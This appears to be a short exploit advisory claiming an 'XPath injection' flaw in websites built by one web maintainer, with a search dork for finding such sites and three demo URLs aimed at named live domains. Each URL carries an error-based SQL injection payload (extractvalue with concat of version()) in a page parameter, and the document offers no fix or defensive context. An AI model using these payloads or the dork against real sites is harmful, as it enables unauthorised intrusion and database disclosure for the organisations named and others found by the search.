# Exploit Title: Fr. Evan Gomes SVD Xpath Injection Vulnerability
# Exploit Author: Behrouz Mansoori
# Date: 2021/03/02
# Dork : "Website Maintained by Fr. Evan Gomes SVD"
# Tested On: Windows 10 / Firefox
#####################################
#poc:
serach Dork : "Website Maintained by Fr. Evan Gomes SVD"
#demo:
https://sarvasevasanghmumbai.org/section.php?section_id=1%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
https://www.svdinm.com/section.php?section_id=29%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
https://starnoldsaduvassery.com/web/view_album.php?album_id=2%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
#####################################
Email : mr.mansoori@yahoo.com
Instagram : behrouz_mansoori
#####################################